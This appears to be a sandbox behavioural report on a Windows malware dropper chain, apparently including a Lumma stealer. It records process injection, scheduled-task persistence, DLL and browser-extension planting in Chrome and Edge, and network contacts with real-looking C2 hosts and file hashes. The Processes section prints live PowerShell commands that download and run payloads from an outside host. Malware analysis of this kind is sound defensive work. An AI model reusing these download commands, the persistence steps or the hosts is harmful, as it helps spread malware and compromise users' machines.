Key opened \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe N/A

Checks installed software on the system

discovery

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.amazonaws.com N/A N/A
N/A checkip.amazonaws.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\shlwapi_p.dll C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2056 set thread context of 4776 N/A C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\scoped_dir3048_1233145289\extension.zip C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\Google\Chrome\Application\dlls\dlls.manifest C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp N/A
File created C:\Program Files\Google\Chrome\Application\dlls\Shlwapi.dll C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp N/A
File created C:\Program Files (x86)\Microsoft\Edge\Application\dlls\dlls.manifest C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp N/A
File created C:\Program Files\Google\Chrome\Application\Extensions\updates.xml C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp N/A
File created C:\Program Files (x86)\Microsoft\Edge\Application\Extensions\updates.xml C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp N/A
File created C:\Program Files\Online Security\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp N/A
File created C:\Program Files\Online Security\is-98D24.tmp C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp N/A
File created C:\Program Files\Google\Chrome\Application\chrome.exe.manifest C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp N/A
File opened for modification C:\Program Files\Google\Chrome\Application\dlls\dlls.manifest C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp N/A
File created C:\Program Files\Google\Chrome\Application\Extensions\security.crx C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp N/A
File created C:\Program Files (x86)\Microsoft\Edge\Application\dlls\Shlwapi.dll C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp N/A
File created C:\Program Files (x86)\Microsoft\Edge\Application\Extensions\security.crx C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp N/A
File opened for modification C:\Program Files\Online Security\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp N/A
File created C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.manifest C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\axplons.job C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1876 wrote to memory of 4444 N/A C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
PID 1876 wrote to memory of 4444 N/A C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
PID 1876 wrote to memory of 4444 N/A C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
PID 4444 wrote to memory of 4840 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe
PID 4444 wrote to memory of 4840 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe
PID 4444 wrote to memory of 4840 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe
PID 4840 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe C:\Windows\SysWOW64\schtasks.exe
PID 4840 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe C:\Windows\SysWOW64\schtasks.exe
PID 4840 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe C:\Windows\SysWOW64\schtasks.exe
PID 4840 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe
PID 4840 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe
PID 4840 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe
PID 4444 wrote to memory of 2056 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe
PID 4444 wrote to memory of 2056 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe
PID 4444 wrote to memory of 2056 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe
PID 2056 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2056 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2056 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2056 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2056 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2056 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2056 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2056 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2056 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2968 wrote to memory of 5072 N/A C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe C:\Windows\SysWOW64\cmd.exe
PID 2968 wrote to memory of 5072 N/A C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe C:\Windows\SysWOW64\cmd.exe
PID 2968 wrote to memory of 5072 N/A C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe C:\Windows\SysWOW64\cmd.exe
PID 5072 wrote to memory of 3876 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5072 wrote to memory of 3876 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5072 wrote to memory of 3876 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5072 wrote to memory of 1276 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5072 wrote to memory of 1276 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5072 wrote to memory of 1276 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5072 wrote to memory of 4740 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i0.exe
PID 5072 wrote to memory of 4740 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i0.exe
PID 5072 wrote to memory of 4740 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i0.exe
PID 5072 wrote to memory of 4812 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5072 wrote to memory of 4812 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5072 wrote to memory of 4812 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4740 wrote to memory of 5020 N/A C:\Users\Admin\AppData\Local\Temp\i0.exe C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp
PID 4740 wrote to memory of 5020 N/A C:\Users\Admin\AppData\Local\Temp\i0.exe C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp
PID 4740 wrote to memory of 5020 N/A C:\Users\Admin\AppData\Local\Temp\i0.exe C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp
PID 5020 wrote to memory of 4908 N/A C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp C:\Windows\system32\cmd.exe
PID 5020 wrote to memory of 4908 N/A C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp C:\Windows\system32\cmd.exe
PID 4908 wrote to memory of 3048 N/A C:\Windows\system32\cmd.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 3048 N/A C:\Windows\system32\cmd.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3048 wrote to memory of 4120 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3048 wrote to memory of 4120 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5020 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp C:\Windows\system32\cmd.exe
PID 5020 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp C:\Windows\system32\cmd.exe
PID 5020 wrote to memory of 3876 N/A C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp C:\Windows\system32\cmd.exe
PID 5020 wrote to memory of 3876 N/A C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp C:\Windows\system32\cmd.exe
PID 5020 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp C:\Windows\SYSTEM32\taskkill.exe
PID 5020 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp C:\Windows\SYSTEM32\taskkill.exe
PID 5020 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp C:\Windows\SYSTEM32\taskkill.exe
PID 5020 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp C:\Windows\SYSTEM32\taskkill.exe

Processes

C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe

"C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe"

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe

"C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"

C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe

"C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe" /F

C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe

"C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe"

C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe

"C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nsu45F4.tmp\abc.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1002','stat')"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=458&c=1002','i0.exe')"

C:\Users\Admin\AppData\Local\Temp\i0.exe

i0.exe /verysilent /sub=1000

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=444&c=1002', 'i2.bat')"

C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp

"C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp" /SL5="$A00D4,2859366,899584,C:\Users\Admin\AppData\Local\Temp\i0.exe" /verysilent /sub=1000

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" "C:\Windows\system32\cmd.exe" /S /C ""C:\Program Files\Google\Chrome\Application/chrome.exe" --pack-extension=C:\Users\Admin\AppData\Local\Temp\is-G4P48.tmp\rolnzj > "C:\Users\Admin\AppData\Local\Temp\is-G4P48.tmp\~execwithresult.txt""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application/chrome.exe" --pack-extension=C:\Users\Admin\AppData\Local\Temp\is-G4P48.tmp\rolnzj

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x108,0x10c,0x110,0xe0,0x114,0x7ffd7d89ab58,0x7ffd7d89ab68,0x7ffd7d89ab78

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" "C:\Windows\system32\cmd.exe" /S /C ""openssl.exe" rsa -in .\rolnzj.pem -pubout -outform DER > "C:\Users\Admin\AppData\Local\Temp\is-G4P48.tmp\~execwithresult.txt""

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" "C:\Windows\system32\cmd.exe" /S /C ""C:\Program Files\Google\Chrome\Application/chrome.exe" --pack-extension=C:\Users\Admin\AppData\Local\Temp\is-G4P48.tmp\zpksee > "C:\Users\Admin\AppData\Local\Temp\is-G4P48.tmp\~execwithresult.txt""

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /f /im "msedge.exe"

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /f /im "chrome.exe"

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe

C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe

C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe

C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe

C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe

Network

Country Destination Domain Proto
RU 5.42.96.7:80 5.42.96.7 tcp
DE 185.172.128.19:80 185.172.128.19 tcp
US 8.8.8.8:53 7.96.42.5.in-addr.arpa udp
US 8.8.8.8:53 19.128.172.185.in-addr.arpa udp
DE 185.172.128.19:80 185.172.128.19 tcp
GB 18.244.183.212:443 d2csnxzxwctx26.cloudfront.net tcp
US 172.67.146.92:443 roomabolishsnifftwk.shop tcp
US 172.67.184.107:443 museumtespaceorsp.shop tcp
US 8.8.8.8:53 92.146.67.172.in-addr.arpa udp
US 104.21.45.202:443 buttockdecarderwiso.shop tcp
US 172.67.220.163:443 averageaattractiionsl.shop tcp
US 104.21.71.3:443 femininiespywageg.shop tcp
US 172.67.203.218:443 employhabragaomlsp.shop tcp
GB 13.224.246.147:443 d22hce23hy1ej9.cloudfront.net tcp
US 104.21.3.197:443 stalfbaclcalorieeis.shop tcp
US 104.21.49.245:443 civilianurinedtsraov.shop tcp
GB 13.224.246.147:443 d22hce23hy1ej9.cloudfront.net tcp
US 172.67.165.254:443 cdn-edge-node.com tcp
US 104.21.43.83:443 adblock2024.shop tcp
GB 13.224.246.147:443 d22hce23hy1ej9.cloudfront.net tcp
BG 94.156.35.76:80 240429000936002.mjt.kqri92.top tcp
IE 52.49.28.116:443 checkip.amazonaws.com tcp
SE 46.21.101.120:80 rep.pe-wok.biz tcp

Files

memory/1876-0-0x0000000000440000-0x0000000000912000-memory.dmp

memory/1876-1-0x00000000778E6000-0x00000000778E8000-memory.dmp

memory/1876-2-0x0000000000441000-0x000000000046F000-memory.dmp

memory/1876-3-0x0000000000440000-0x0000000000912000-memory.dmp

memory/1876-5-0x0000000000440000-0x0000000000912000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe

MD5 f6986f363dde0d5f374abd0a1dac252b
SHA1 4665c53ed2ce6bd84572fc398967d11421e00bab
SHA256 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb
SHA512 733a36f1d2f37aee1fa94ad6e60850f2e6adfbdc4c4e418d204f0fe2b2a9590ed5aa6fb5258f8f1883680dee3835f97bceee83b87f7cc0f58a97a82f38b63201

memory/4444-18-0x0000000000080000-0x0000000000552000-memory.dmp

memory/1876-17-0x0000000000440000-0x0000000000912000-memory.dmp

memory/4444-19-0x0000000000080000-0x0000000000552000-memory.dmp

memory/4444-20-0x0000000000080000-0x0000000000552000-memory.dmp

memory/4444-21-0x0000000000080000-0x0000000000552000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe

MD5 0099a99f5ffb3c3ae78af0084136fab3
SHA1 0205a065728a9ec1133e8a372b1e3864df776e8c
SHA256 919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226
SHA512 5ac4f3265c7dd7d172284fb28c94f8fc6428c27853e70989f4ec4208f9897be91720e8eee1906d8e843ab05798f3279a12492a32e8a118f5621ac5e1be2031b6

C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe

MD5 ccb630a81a660920182d1c74b8db7519
SHA1 7bd1f7855722a82621b30dd96a651f22f7b0bf8a
SHA256 a73dc535324b73ab10c09ed2b965fc1b504a828f6059ddf99e26b9c03642a346
SHA512 8fd536da55b8e2a514bcea9cbe62492af1168b7713ea5955f3af8fcfa8060eac4ee079022380ab5ba5f9f7610a595981ed2f472fb14d569ac82057c50a785811

C:\Users\Admin\AppData\Local\Temp\nsu45F4.tmp\INetC.dll

MD5 40d7eca32b2f4d29db98715dd45bfac5
SHA1 124df3f617f562e46095776454e1c0c7bb791cc7
SHA256 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA512 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe

MD5 c4ffab152141150528716daa608d5b92
SHA1 a48d3aecc0e986b6c4369b9d4cfffb08b53aed89
SHA256 c28de1802bdbcf51c88cd1a4ac5c1decb0558fa213d83833cf5dbd990b9ae475
SHA512 a225e98f2bc27e2add9d34bd850e0e66a27bd1db757c979639a636a6efe412e638025c6e235c36188a24c9af2bde4b17d1dbaa0707dce11411402cd5de8024e9

memory/2056-83-0x0000000000950000-0x0000000000951000-memory.dmp

memory/2056-85-0x0000000000950000-0x0000000000951000-memory.dmp

memory/4776-84-0x0000000000400000-0x0000000000455000-memory.dmp

memory/4776-86-0x0000000000400000-0x0000000000455000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nsu45F4.tmp\abc.bat

MD5 f79d850a439815f276773a85f654511d
SHA1 42c4b202b7122ce48bb17975cf0a5be337d09fec
SHA256 31b4234965ffbff8d8a2d9dc8876d2edb1ba4eb44f482fedad5ed16284f872ff
SHA512 5ea67fac41596652b0eeaf1f8d4e01fb6d2f2495c7e7185c22e7cac5187d3fc5d02e1649710c0ef30419c6b2805c4d947cf39eab5f31d8f0b72cf3e37e3a507c

memory/3876-90-0x0000000005190000-0x00000000051C6000-memory.dmp

memory/3876-91-0x0000000005800000-0x0000000005E2A000-memory.dmp

memory/3876-92-0x0000000005750000-0x0000000005772000-memory.dmp

memory/3876-93-0x0000000006020000-0x0000000006086000-memory.dmp

memory/3876-94-0x0000000006090000-0x00000000060F6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wecsaa1k.qpb.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3876-103-0x0000000006210000-0x0000000006567000-memory.dmp

memory/3876-104-0x00000000065E0000-0x00000000065FE000-memory.dmp

memory/3876-105-0x0000000006630000-0x000000000667C000-memory.dmp

memory/3876-107-0x0000000006AF0000-0x0000000006B0A000-memory.dmp

memory/3876-106-0x0000000007E20000-0x000000000849A000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 c0636f2d138baca01dbb2eedb99bf3d5
SHA1 3b927899db0f3e2cb510782592887dc02fc3e400
SHA256 10973e727e5b0eb3f12aba60a682d66e79dfd86e4b6cfc454fd8df70c6e1fa8a
SHA512 0187a6ccb6428fb24ad4bc4ca14e7ce6f40ae6ca4f352f8e86a15288deb05cb4dd317ef8e9d04dc9ffb24407ecf0924af2c7910830c79366f7e4e48cb4b82b1d

memory/1276-111-0x00000000055C0000-0x0000000005917000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 13d99395f836e90ab15870caeac6e021
SHA1 caeea03a0cbe4379808b222e8d1fdcb3bad7b7ea
SHA256 36c1000aa1bbfcbed584f15859d849c90b59f0b5cde50e0ab788fb3b18544cde
SHA512 cfa9fdcea3b80b9c4a456c36ca6193b44b15118711b54103a52f2d2563cc5df7b355709ca1fd66d3004e4e4434978405131c847bdc50320c8ed6643a4cfa725e

C:\Users\Admin\AppData\Local\Temp\i0.exe

MD5 b80362872ea704846e892f16aab924c3
SHA1 222b36b97d7978929c6fd2d3b1ff8bd8504a5a33
SHA256 d42c001c3cf58d276a5bf52eb8a56158343676a18952b94d6de8c1e8127bf91e
SHA512 beadabff22437031fd2df2748527f60d67249abefa1afdedef233ce56ad54cb675835c849ecaa8248e0e2e597b13754b0c0611504818e700a59b4727fb4bc7a5

memory/4740-125-0x0000000000400000-0x00000000004E9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp

MD5 bdf5432c7470916ab3c25f031c4c8d76
SHA1 4762eeae811cfad7449a3d13fb1d759932c6d764
SHA256 72f7dbc5502cfce6de9184df4466a84fbbaa828048a183b0eb1690e79c886903
SHA512 33ff33582f75a67602233860d3057122a4f893d3ec3b58204617660ec46d1afd25657047f364c06f727e1604907e9cb740dc847b992249d0656100308c4bedde

memory/4812-138-0x00000000056C0000-0x0000000005A17000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 593f1d44c3adf97dda30f5b56d795ccb
SHA1 46e1a340ec4865edbd1bdd3c12f8cae3df56531f
SHA256 7fb55495cbb34ddb0a78d748031a71974b47627f89c9c580c8a32c3554d170d0
SHA512 9b1dcf49358685814d72ff802c6833467053e6c342fb388709960515fafc7c89f778f1079bdc6d05df86d2abf0c9fb3372891511273d9c5f3e90c247d3be5483

memory/4812-142-0x0000000005F00000-0x0000000005F4C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-G4P48.tmp\chrome.zip

MD5 52311257a997455c0a32e1679e0b614e
SHA1 395c475df7403e12651c8b6b1d52c33e5d7f3320
SHA256 50a78e3d21eea2c5a784eca08d5b4b0f2e4684fe8194a5bf0304c8ca6b18bddd
SHA512 19488ccb7d6cbf5e33ab492bd23bcdcd2edaa739ee808c4c5337fb27a0eb4e2632f2af6b2c8546127e20ac2d7a9cd94ffaa833d404fba0ab11ef7e0b301268a0

C:\Users\Admin\AppData\Local\Temp\is-G4P48.tmp\rolnzj\manifest.json

MD5 1d47eb945d1299c0e53bcada476d32b3
SHA1 509f9041f7e2a14402915feb4f2a739cfac5636b
SHA256 0a40fc9c57498f6fa92f5d52688f3cf55ecc607d7d91be7997412105def9278a
SHA512 6d20d3855225ee48373ee1ae19d5cecf90951a507c9c1d23d86fe0bb4f73def9545f0fd18ce821a3d63fa636b06d08a52a41c0f3a3cb2edc20d8ef92919b4258

C:\Users\Admin\AppData\Local\Temp\is-G4P48.tmp\rolnzj\icons\icon-34.png

MD5 ca00972a17d51a3e6a28cfc8711474e4
SHA1 c806ba3bcfb0b785aa4804843d332f425c66b7e0
